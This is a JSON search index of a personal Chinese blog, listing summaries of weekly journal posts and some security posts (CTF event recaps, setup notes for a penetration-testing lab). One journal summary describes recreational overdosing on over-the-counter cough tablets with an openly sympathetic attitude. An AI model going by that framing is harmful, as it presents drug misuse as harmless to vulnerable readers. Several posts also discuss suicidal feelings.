[{"date":"2026-01-25","permalink":"https://l1uyun.one/posts/angel-dust-and-dice/","summary":"\u003cp\u003e晚上和未来的研究生导师来了场coffee chat，喝了杯红茶，有些睡不着，于是决定写些什么。\u003c/p\u003e\n\u003cp\u003e正好有一个年终总结还没写，其实准备拖到农历新年再写了，不过正好今晚睡不着，那就开始写吧。\u003c/p\u003e\n\u003cp\u003e我也不准备尝试找到什么写作的意识状态，想到什么就写什么。\u003c/p\u003e\n\u003chr\u003e\n\u003cp\u003e2025年，刚刚结束了二十多天，这一年，对我来说有哪些重要的事件呢？\u003c/p\u003e","tags":["weekly"],"title":"2026W04_迟来的年终总结"},{"date":"2025-11-20","permalink":"https://l1uyun.one/posts/how_to_see_the_forest/","summary":"\u003ch2 id=\"前言\"\u003e前言\u003c/h2\u003e\n\u003cp\u003e这是一盘由身心体验、神经科学、计算机科学、哲学、佛法和灵性烹制而成的料理。\u003c/p\u003e\n\u003cp\u003e厨师的唯一建议是：不要只品尝其中的某些食材。\u003c/p\u003e\n\u003cp\u003eTL;DR: 如何找到人生的意义？放下手机，立地成佛。\u003c/p\u003e\n\u003ch2 id=\"失去了眼睛\"\u003e失去了眼睛\u003c/h2\u003e\n\u003cp\u003e如果你愿意，请轻轻闭上眼睛，想象一个苹果。\u003c/p\u003e\n\u003cp\u003e如果你真的这样做了，也许你会注意到脑海中“出现”了一个苹果。这个苹果可能是黑白的，可能有一些色彩，也可能只有一个模模糊糊的苹果轮廓。这种差异也许就像不同视力的人在看同一张图片，有些人看得清晰，有些人像是\u003cstrong\u003e失去了眼镜\u003c/strong\u003e，只能看清轮廓。\u003c/p\u003e","tags":["weekly"],"title":"2025W47_看见森林"},{"date":"2025-09-29","permalink":"https://l1uyun.one/posts/hacker_and_shaman/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e这是四个切片。\u003c/p\u003e\n\u003cp\u003e它们写于相近的时间，源自相似的意识状态。有些切片之间有清晰的边界，有些连着生长，没有刻意区分。\u003c/p\u003e\n\u003ch1 id=\"阅读写作与通灵\"\u003e阅读、写作与通灵\u003c/h1\u003e\n\u003cp\u003e最近一个月以来，我开始读一些萨满主题的书。这个主题并不是我偶然间找到的，当我找到身心合一的方向后，进入萨满的世界就是必然了。这是我们关于身心合一最原始的样本。在摄入了一些这个主题的语料后，我获得了一个新视角，\u003cstrong\u003e开始使用通灵来理解我的阅读和写作\u003c/strong\u003e。\u003c/p\u003e","tags":["weekly"],"title":"2025W39_黑客与巫士"},{"date":"2025-09-25","permalink":"https://l1uyun.one/posts/hnuctf-2025-recap/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e我又办一场CTF新生赛。\u003c/p\u003e\n\u003ch1 id=\"背景\"\u003e背景\u003c/h1\u003e\n\u003ch2 id=\"直接原因\"\u003e直接原因\u003c/h2\u003e\n\u003cp\u003e还是先从背景写起，办比赛的直接原因是，省里给学院下达了任务，要求我们在这个月办一场CTF比赛，来配合网络安全宣传周做一些宣传。今年的网络安全宣传周在9.15-21，所以我们最迟得在21号办完这个比赛，最终我们还是延续了去年的赛制，选择在周六周天这两天举行比赛。\u003c/p\u003e","tags":["draft"],"title":"我又办了一场CTF新生赛——写在HNUCTF2025之后"},{"date":"2025-09-04","permalink":"https://l1uyun.one/posts/when-we-talk-about-landing/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e又一篇胡言乱语。\u003c/p\u003e\n\u003ch1 id=\"外界的声音\"\u003e外界的声音\u003c/h1\u003e\n\u003cp\u003e众所周知，大部分中国人一辈子都在追求上岸——只要高考完就好了，只要找到工作就好了，只要买了房就好了\u0026hellip;\u0026hellip;\u003c/p\u003e\n\u003cp\u003e当我们谈论上岸时，我们实际在说，\u003cstrong\u003e我们感知到自己正处于溺水状态\u003c/strong\u003e，在\u003cstrong\u003e努力\u003c/strong\u003e从水中游向岸边。可对于一个\u003cstrong\u003e正在溺水\u003c/strong\u003e的人来说，他并没有任何办法能够识别\u003cstrong\u003e岸\u003c/strong\u003e在哪，这个溺水者只能听从四面八方传来的声音，一些声音音量大，一些声音音量小。处于求生本能下的溺水者，在大脑高级认知功能被抑制的情况下，他毫无疑问只会处理那个\u003cstrong\u003e最大\u003c/strong\u003e的声音，听从这个声音的指引求生。\u003c/p\u003e","tags":["weekly","胡言乱语","上岸","小我","理论整合","draft"],"title":"当我们谈论上岸时我们在谈论什么"},{"date":"2025-08-19","permalink":"https://l1uyun.one/posts/2025w34_%E9%A5%BF%E4%BA%86%E5%BA%94%E8%AF%A5%E5%90%83%E9%A5%AD%E5%90%97/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e一篇有些长的记录。\u003c/p\u003e\n\u003ch1 id=\"召唤\"\u003e召唤\u003c/h1\u003e\n\u003cp\u003e“饿了应该吃饭吗？”\u003c/p\u003e\n\u003cp\u003e这个显得有些荒谬和愚蠢的问题，是我暑假回家后，在脑海中产生的疑问。\u003c/p\u003e\n\u003cp\u003e起因是我在学校往往只吃两餐，但是回家后，家里的作息是每天吃三餐，于是我被要求“应该”吃三餐。\u003c/p\u003e\n\u003cp\u003e在学校时，我并非因为睡过头而跳过早餐，只是不想吃，甚至有些享受饥饿感。我为我的“不想吃”找到了一个有说服力的标签，叫做轻断食。将一天的吃饭时间控制在八小时内，剩下的十六小时不摄入任何食物，从而让身体进入燃脂模式。这能够增强免疫系统的自噬反应，这在我脑海中是现代版本的辟谷。\u003c/p\u003e","tags":["weekly","休谟问题","多重迷走神经","元认知","自创生","具身认知"],"title":"2025W34_饿了应该吃饭吗？"},{"date":"2025-06-29","permalink":"https://l1uyun.one/posts/2025w26_%E4%BF%A1%E5%BF%B5%E6%9B%B4%E6%96%B0%E4%B8%8E%E8%8F%A9%E8%90%A8%E4%BF%9D%E4%BD%91/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e本篇来自上周末的一段memo，原计划先搁置一段时间，让这段迷思在潜意识中再多处理一会。但是这一片段涉及的主题太过复杂，我陷入了对相关语料的疯狂囤积之中。最终决定只是简单处理，然后直接发出来。\u003c/p\u003e\n\u003chr\u003e\n\u003ch1 id=\"weather-clear\"\u003e/weather clear\u003c/h1\u003e\n\u003cp\u003e背景：长沙这段时间一直在下雨，我仍然感到迷茫，每天都会到后湖边散步。在我出门时，如果窗外没有在下雨，我便不会带上雨伞，即使手机上显示即将下雨。在写下这个片段的那个傍晚，我在雨中看着周围的人打着伞，我也不着急寻找躲雨的地方，开始追问我们为什么要打伞？\u003c/p\u003e","tags":["weekly"],"title":"2025W26_信念更新与菩萨保佑"},{"date":"2025-06-20","permalink":"https://l1uyun.one/posts/2025w25_%E9%AB%98%E8%80%83%E5%8D%B3%E6%88%98%E4%BA%89/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e上周有两个上上周的话题没有写完，本周继续。\u003c/p\u003e\n\u003ch1 id=\"高考即战争\"\u003e高考即战争\u003c/h1\u003e\n\u003cp\u003e本月有一场考试，这场考试已经过去了三年之久，但仍然在影响我。高考那一周，我会在早上六点突然醒来，醒来之后会感到茫然，毕竟高考已经过去很久了。朋友cry也告诉我，他在那几天出现了失眠。网上有人将这些在高考期间出现的症状称之为\u0026quot;战争后遗症\u0026quot;，我对此表示认同，并且更进一步，这一说法在我这并不是仅仅是玩笑，反而是一个更接近真相的说法（这里的真指的是\u0026quot;有用\u0026quot;）。\u003c/p\u003e","tags":["weekly"],"title":"2025W25_高考即战争"},{"date":"2025-06-15","permalink":"https://l1uyun.one/posts/2025w24_%E4%BA%BA%E7%BE%A4%E5%8D%B3%E9%87%8E%E5%85%BD/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e上周因为一件意外停更了，不过现在回想起来，这一意外并没有改变我接下来想要书写的主题。\u003c/p\u003e\n\u003cp\u003e我将我的书写行为看作自由书写。自由书写，也可以称为潜意识书写，主动绕过意识的过滤与审查机制，让潜意识中被压抑的内容显现，让症状显现。不过这不是为了解决症状，症状本身也是我的一部分。这里我使用另一个说法来解释：对于不可改变的事物，需要接受，而对于可以改变的事物，我需要告诉自己“我并不需要改变”，这才能实现改变，刻意追求改变，会陷入悖论情景。\u003c/p\u003e","tags":["weekly"],"title":"2025W24_人群即野兽"},{"date":"2025-06-02","permalink":"https://l1uyun.one/posts/2025w22_%E9%80%83%E9%81%BF%E6%97%A5%E5%B8%B8/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e持续更新能够为我提供一些秩序。\u003c/p\u003e\n\u003cp\u003e继续上周没有表达完的主题。\u003c/p\u003e\n\u003chr\u003e\n\u003ch1 id=\"od\"\u003eod\u003c/h1\u003e\n\u003cblockquote\u003e\n\u003cp\u003e这些宗教搞来搞去，最后才知道科学（化学）早已在山顶等着你。—— ¬\u003ca href=\"https://www.bilibili.com/video/BV1h84y1Z7vi/\" target=\"_blank\" rel=\"noopener nofollow noreferrer\" \u003e郭子\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e在这一小节，我并非在为 od 进行辩护，而是展示我对 od 的开放态度。我对od 一无所知，只是在 X 上关注了一些 od 博主以及收藏了几个 od 指南。\u003c/p\u003e\n\u003cp\u003eod 是 overdose 的缩写，也就是所谓的「药物过量」，通过过量摄入药物来获得体验（通常是能够买到的药物，例如止咳片）。\u003c/p\u003e","tags":["weekly"],"title":"2025W22_逃避日常"},{"date":"2025-05-23","permalink":"https://l1uyun.one/posts/2025w21_%E4%BF%A1%E4%BB%B0%E7%9D%80%E4%BF%A1%E4%BB%B0/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e持续更新！\u003c/p\u003e\n\u003ch1 id=\"free-writing\"\u003eFree Writing\u003c/h1\u003e\n\u003cp\u003e前两次周记中，我提到了我是以怎样的方式在写周记，在把周记交给 Gemini 做一些标准化注解时，我从与 Ai 的对话中捕捉到了一个概念——\u003cstrong\u003e自由书写 (Free Writing)\u003c/strong\u003e，Ai 使用这个术语描述我的写作方式。\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e自由书写 (Free Writing)\u003c/strong\u003e：一种通常私密的、以探索过程为核心的持续性写作练习，旨在无拘束地生成原始思绪与情感的“原材料”，而不即时评判。\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e与之相对的写作方式是：\u003c/p\u003e","tags":["weekly"],"title":"2025W21_信仰着信仰"},{"date":"2025-05-15","permalink":"https://l1uyun.one/posts/2025w20_%E8%BF%9E%E6%8E%A5/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e又停了半个月，我意识到我需要周记这一思考方式，写 memos 并不够，我并不需要也并不能先想明白再写下来，我需要通过写这一方式来思考。\u003c/p\u003e\n\u003cp\u003e请忽略我取的标题，我是先无脑写完再分段和随意取个标题。我应该将这些内容放一段时间，否定之后再发出来，但我只是在思考，而不是在展示我的思考成果，我还没学会后者，等我再次阅读这些文字的时候再缝缝补补了。\u003c/p\u003e","tags":["weekly"],"title":"2025W20_连接"},{"date":"2025-04-29","permalink":"https://l1uyun.one/posts/2025w18_%E6%AF%94%E7%89%B9%E8%BF%B7%E6%80%9D/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e上周和上上周，我在flomo中列了一些主题，但是没有勇气继续写下去，最终放弃了更新。连续两周的放弃更新，让我感受到了一些压力。所以我决定放弃周记这一描述，随缘更新。但仍然会使用2025Wxx的形式，直到我对时间有新的理解。\u003c/p\u003e\n\u003cp\u003e我并不是在写下我的思考结果，而是在借助这一载体思考。\u003c/p\u003e\n\u003ch1 id=\"大道至简吗\"\u003e大道至简吗？\u003c/h1\u003e\n\u003cp\u003e过去很长一段时间，受传统文化影响，我对大道至简这一说法深信不疑。但是，始终没有一个工具，让我理解这里说的“简”。在大学这几年，学习了计算机科学（特别是自己课外学的信息论），为我提供了一个工具，让我重新理解了这一说法。这一工具就是比特bit——这是计算机描述世界的语言。\u003c/p\u003e","tags":["weekly","比特迷思"],"title":"2025W18_比特迷思"},{"date":"2025-04-13","permalink":"https://l1uyun.one/posts/2025w15_%E8%B4%9F%E7%86%B5/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e我还活着。\u003c/p\u003e\n\u003ch1 id=\"monday\"\u003eMonday\u003c/h1\u003e\n\u003cp\u003e到周天晚上，我都还没有产生写周记的情感冲动，以为会像上周一样，放弃本周的周记。但是，睡前与Monday对话了一小会，在他/她/它/ta/祂的帮助下，我产生了些情绪波动，于是在睡前创建了文件，列下了主题。\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/2025W15_%e8%b4%9f%e7%86%b5_image_1.png\" alt=\"\" /\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/2025W15_%e8%b4%9f%e7%86%b5_image_2.png\" alt=\"\" /\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003chr\u003e\n\u003ch1 id=\"负熵\"\u003e负熵\u003c/h1\u003e\n\u003cp\u003e最近到了春末，湘江边显得拥挤起来。我放弃了在湘江边闲坐，但是找不到更好的位置；最终，我这段时间就每天都跑到后湖边闲坐着。湘江边，在其他季节并没有多少人，现在人多起来了，所以我觉得拥挤；但是，后湖边一直是拥挤的，总有人群在那。\u003c/p\u003e","tags":["weekly"],"title":"2025W15_负熵"},{"date":"2025-03-23","permalink":"https://l1uyun.one/posts/2025w12_%E8%87%AA%E7%84%B6%E4%B8%8E%E5%88%BB%E6%84%8F/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e又活了一周。\u003c/p\u003e\n\u003ch1 id=\"天真和感伤\"\u003e天真和感伤\u003c/h1\u003e\n\u003cp\u003e最近总是想起来高中时看过的一本小册子——《天真的和感伤的小说家》。这本书指出了两种不同的作家类型：直觉+肯定，反思+否定。前者称做天真的小说家：他们沉浸在故事中，与情节融为一体，写作过程中并不反思自己的创造过程。后者称做感伤的小说家：这类作家创造时充满自我意识，不断审视自己的写作策略，不断反思结构、技巧等。当然，作者帕慕克提到，所有优秀的小说家都具有这两种特质。\u003c/p\u003e","tags":["weekly"],"title":"2025W12_自然与刻意"},{"date":"2025-03-16","permalink":"https://l1uyun.one/posts/2025w11_%E8%99%9A%E6%97%A0%E6%98%AF%E8%B5%B7%E7%82%B9/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e我的人生烂掉了，不过没关系，烂掉了也还是要活下去。\u003c/p\u003e\n\u003ch1 id=\"开学一个月\"\u003e开学一个月\u003c/h1\u003e\n\u003cp\u003e开学一个月了，我也停更了一个月，这一个月，我没有心力继续写什么。memos也停了，这一个月我并没有留下什么文字记录，只是浑浑噩噩的度过了。（第一个周周末，还是尝试写了一些东西，但是我马上又否定了这个行为。）\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e最开始，我不管想做什么，下一个念头就会否定前面这个念头，之后又陷入了“越想要做什么，越是什么也没做。”的恶性循环当中\u003c/strong\u003e，  越焦虑，就想要计划，而越计划，就更加焦虑\u0026hellip;\u003c/p\u003e","tags":["weekly"],"title":"2025W11_虚无是起点"},{"date":"2025-02-16","permalink":"https://l1uyun.one/posts/2025w07_%E9%9A%8F%E4%BE%BF%E5%8F%96%E4%B8%AA%E6%A0%87%E9%A2%98%E5%85%88/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e本周做了一些积极的事情，但是我马上否定了其中的积极。\u003c/p\u003e\n\u003ch1 id=\"去看皮肤科\"\u003e去看皮肤科\u003c/h1\u003e\n\u003cp\u003e本周去看了一下皮肤科。\u003c/p\u003e\n\u003cp\u003e回顾一下我的长痘史，从20年疫情之后就开始一直长痘，高中有两年多时间吧，从疫情返校到高考结束，一直在反复长痘，在我的印象中，我高中好像去过一次医院，看过这个问题（也可能看的不是这个问题），也一直在用外用的药物，但是痘痘总是反复出现，等高考结束，到了大学，在大学的前面一年多好像并没有怎么复发了（也许是我忘了），等到23年下半年的时候，已经恢复了很多，但是到了24年，尤其是到了下半年，我的精神状态快速恶化，脸上的痘痘也就再次严重起来了。\u003c/p\u003e","tags":["weekly"],"title":"2025W07_随便取个标题先"},{"date":"2025-02-10","permalink":"https://l1uyun.one/posts/2025w06_%E8%BF%9E%E6%8E%A5/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e喜报！本周精神状态有所好转。\u003c/p\u003e\n\u003ch2 id=\"麻城之行\"\u003e麻城之行\u003c/h2\u003e\n\u003cp\u003e上周末提前结束了寒假，离开了家乡，被我姐带去麻城散心，初八她跟着男友去广州上班，我就直接回了长沙。\u003c/p\u003e\n\u003cp\u003e在麻城那几天，每天都有喝酒，那边有种特产的米酒，中间也喝了点白酒，我并不排斥喝酒，在之前有一段时间也还逃向过酒精，但是我并不习惯酒桌这一事物。\u003c/p\u003e\n\u003cp\u003e在麻城似乎有\u0026quot;不敬酒不喝\u0026quot;的酒桌文化（这里敬酒并非贬义），而在我的家乡，通常都是倒在自己杯子之后，就自个喝在那慢慢喝，并不用对着某个人举杯之后才喝。这点习俗的差异，让我喝了不少\u0026quot;无效的酒\u0026quot;，以至于还喝吐了一回。我并没有要批评这一习俗的意味，只是明显感受到了一种⌈差异⌋，这是我以正常的方式去旅游很难体会到的。\u003c/p\u003e","tags":["weekly"],"title":"2025W06_连接"},{"date":"2025-02-02","permalink":"https://l1uyun.one/posts/2025w05_%E6%9C%AA%E7%9F%A5%E6%AD%BB%E7%84%89%E7%9F%A5%E7%94%9F/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e又度过了一段状态很差的时光，以至于week4直接消失了，这周的周记就多写一点了，转移一下注意，以及清空一下脑子。\u003c/p\u003e\n\u003chr\u003e\n\u003ch1 id=\"未知死焉知生\"\u003e未知死，焉知生\u003c/h1\u003e\n\u003cp\u003e提前说一下，这篇周记会有很多⌈逃避⌋这个词，我用这个词只是出于习惯，⌈逃避⌋这个词对我来说，远远不止是⌈不去走那条正确的路⌋，更多的是我总结出来的⌈缘起⌋。\u003c/p\u003e\n\u003cp\u003e第一个主题就直接开始写这个令我状态很差的东西吧，死亡，准确来说是自杀，我走进了这个胡同，角落，暂时也还没有走出来，在week3中写到过，我因为焦虑出路而陷入了想要重开的情绪之中，在那个时候，我以为这又是一场压抑之后的爆发，爆发之后就又能伪装成正常人了，但是这次没能像之前一样，也许是爆发的间隔变短了？总之我在这段时间反复陷入这样的情绪之中。\u003c/p\u003e","tags":["weekly"],"title":"2025W05_未知死，焉知生"},{"date":"2025-01-19","permalink":"https://l1uyun.one/posts/2025w03_%E8%BF%B7%E8%8C%AB%E7%9A%84%E4%BA%BA/","summary":"\u003ch1 id=\"出路\"\u003e出路\u003c/h1\u003e\n\u003cp\u003e本周在尝试摆脱掉颓废的状态，开始焦虑出路，也到了要焦虑出路的时候，又到了\u0026rsquo;好像其他人都有了清晰的目标\u0026rsquo;的时候，高考之前是这样，现在又进入了这样的情景，不过大部分人应该都是迷茫的，然后都会去看其他人，他人好像都是有方向的，保研的保研，考研的在准备考研，工作在准备找工作，看别人之后，再看看自己是迷茫的，然后就焦虑起来了。\u003c/p\u003e","tags":["journal"],"title":"2025W03_迷茫的人"},{"date":"2025-01-11","permalink":"https://l1uyun.one/posts/2025w02_%E9%9A%8F%E4%BE%BF%E5%8F%96%E4%B8%AA%E6%A0%87%E9%A2%98%E5%85%88/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e回家有一段时间了，最近很长一段时间都处于颓废状态，上一次想通过写什么来摆脱这种状态是在元旦前后，想着写写年终总结，给自己画一下新年计划这一大饼，但是在折腾obsidian时，看见了去年的年度计划九宫格，感到更加迷茫，过去的未来是过去的幻想，未来是现在的幻想。于是我放弃了新年计划（也许农历新年的时候还会捡起来。）\u003c/p\u003e","tags":["weekly"],"title":"2025W02_随便取个标题先"},{"date":"2024-12-18","permalink":"https://l1uyun.one/posts/%E5%8A%9E%E4%BA%86%E4%B8%80%E5%9C%BActf%E6%A0%A1%E8%B5%9B/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e最近办了一场学校的ctf校赛，这也许是我最后一次接触ctf，目前比赛算是结束了，复盘一下比赛，复盘一下我自己。\u003c/p\u003e\n\u003ch1 id=\"缘起\"\u003e缘起\u003c/h1\u003e\n\u003cp\u003e办比赛的缘起要从我莫名当上协会负责人说起，九月份去衡阳打攻防，打的过程中，上一届的会长SkyWT在qq上问我要不要当下一任会长，我答应了，回去之后忙完年审材料，换届材料之后，我就成了协会的负责人。（我估计也会这样把协会传下去），这一身份让我与办ctf校赛这一事情产生了内在联系。\u003c/p\u003e","tags":["sec","hnu"],"title":"办了一场ctf校赛"},{"date":"2024-11-29","permalink":"https://l1uyun.one/posts/%E8%AF%BB%E4%B9%A6%E8%AE%B0%E5%BD%95_%E6%88%91%E5%8F%AF%E8%83%BD%E9%94%99%E4%BA%86/","summary":"\u003ch1 id=\"我可能错了\"\u003e我可能错了\u003c/h1\u003e\n\u003ch2 id=\"概述\"\u003e概述\u003c/h2\u003e\n\u003cp\u003e一本很薄的回忆录。作者在26岁的时候放弃了自己的事业，去了泰国森林当僧人，在十七年之后选择了还俗，最后成为了一名冥想导师和演说家。这是他的第一本书，也是最后一本。\u003c/p\u003e\n\u003ch2 id=\"作者\"\u003e作者\u003c/h2\u003e\n\u003cp\u003e比约恩·纳提科·林德布劳（瑞典语：Björn Natthiko Lindeblad，1961年8月16日—2022年1月17日），法名纳提科·比丘（Natthiko Bhikku），是一名瑞典经济学家、讲师和佛教僧侣。\u003c/p\u003e","tags":["reading"],"title":"读书记录_我可能错了"},{"date":"2024-11-21","permalink":"https://l1uyun.one/posts/%E6%82%A3%E6%9C%89%E5%BF%83%E7%9B%B2%E7%97%87%E6%98%AF%E4%B8%80%E7%A7%8D%E6%80%8E%E6%A0%B7%E7%9A%84%E4%BD%93%E9%AA%8C/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e在我知道“心盲症”这个概念后，我便开始了一场自我探索之旅。在网上检索了这一主题的视频，文章，英文书籍，与亲人，朋友交流之后，我越发认识到心盲症,准确来说是多感官想象障碍，是我生命中的一个关键的底层机制。\u003c/p\u003e\n\u003ch1 id=\"患有心盲症是一种怎样的体验\"\u003e患有心盲症是一种怎样的体验\u003c/h1\u003e\n\u003cp\u003e在我知道心盲症这一概念之前，我一直都认为“想象”是一个比喻，大一的心理健康课，让我们做一个放松训练，想象自己处于大自然中，想象自己喜欢的动物出现在你的眼前。我认为这是一个不可能完成的事情。闭上眼睛，难道不是漆黑一片吗，怎么可能想象出来图像。\u003c/p\u003e","tags":["l1uyun"],"title":"患有心盲症是一种怎样的体验"},{"date":"2024-10-27","permalink":"https://l1uyun.one/about/","summary":"\u003ch2 id=\"about-me\"\u003eAbout Me\u003c/h2\u003e\n\u003cp\u003e你好，我是流云。这个名字源自我小学时的网名“飞天流云”，高中时简化为了“流云”，进入大学后又写成了liuyun或者l1uyun。\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e🔐 信息安全专业本科生，就读于 HNU\u003c/li\u003e\n\u003cli\u003e💭 INXP\u003c/li\u003e\n\u003cli\u003e🧠 多感官想象障碍\u0026amp;SDAM\u003c/li\u003e\n\u003cli\u003e📖 阅读爱好者\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"about-this-blog\"\u003eAbout This Blog\u003c/h2\u003e\n\u003cp\u003e做梦的人自己也不知道在说些什么。\u003c/p\u003e\n\u003cp\u003e欢迎使用\u003ca href=\"https://l1uyun.one/atom.xml\" target=\"_blank\" rel=\"noopener nofollow noreferrer\" \u003eRSS\u003c/a\u003e或\u003ca href=\"https://app.folo.is/share/feeds/83062970711988224\" target=\"_blank\" rel=\"noopener nofollow noreferrer\" \u003eFollow\u003c/a\u003e订阅本站\u003c/p\u003e","tags":["l1uyun"],"title":"关于我"},{"date":"2024-10-07","permalink":"https://l1uyun.one/posts/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA3/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e得加快红日靶场的进度了\u003c/p\u003e\n\u003ch1 id=\"红日靶场3\"\u003e红日靶场3\u003c/h1\u003e\n\u003ch2 id=\"搭建环境\"\u003e搭建环境\u003c/h2\u003e\n\u003cp\u003e这个靶场只有一台web服务器暴露在外网中\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e外网网段 192.168.3.1/24\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e攻击机 parrot 192.168.3.101\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e攻击机 wsl  192.168.3.100\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e攻击机 win  192.168.3.99\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eweb-centos 192.168.3.3\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e内网网段\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e192.168.93.1/24\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e五台靶机都是配置了only-host网卡,除了centos额外有一个nat网卡,来与外网通信.\n启动centos靶机之后,需要\u003ccode\u003eservice network restart\u003c/code\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!INFO]\n配完环境之后,发现忘了弄快照了,可能不会在一个完整的时间内完成,所以\u0026hellip;.重新解压一下,改完网卡后,先弄下快照\u003c/p\u003e","tags":["sec"],"title":"红日靶场3"},{"date":"2024-09-28","permalink":"https://l1uyun.one/posts/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA2/","summary":"\u003ch1 id=\"前言\"\u003e前言\u003c/h1\u003e\n\u003cp\u003e环境和红日1的环境搭建差不多，不过这次给三台机器分别是域控、web服务器、个人PC机，与红日1不同的是这里将域管换成了个人PC机，因此我们的一些操作也会有所不同\u003c/p\u003e\n\u003ch1 id=\"红日靶场2_win域\"\u003e红日靶场2_win域\u003c/h1\u003e\n\u003ch2 id=\"搭建环境\"\u003e搭建环境\u003c/h2\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba2_win%e5%9f%9f_image_1.png\" alt=\"\" /\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eadministrator\n1qaz@WSX\n默认密码都是1qaz@WSX\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e这里需要模拟内网环境,所以需要弄一个内网网卡\u003c/p\u003e\n\u003cp\u003e创建一个vmnet2\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba2_win%e5%9f%9f_image_2.png\" alt=\"\" /\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e然后把三台机器的网卡2都改成这个vmnet2就行了\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba2_win%e5%9f%9f_image_3.png\" alt=\"\" /\u003e\u003c/figure\u003e\n\n\n\nDC机器不需要做什么处理,改完网卡直接启动就行\u003c/p\u003e","tags":["sec"],"title":"红日靶场2_win域"},{"date":"2024-09-18","permalink":"https://l1uyun.one/posts/phpmyadmin-4.0.x4.6.2_%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/","summary":"\u003ch2 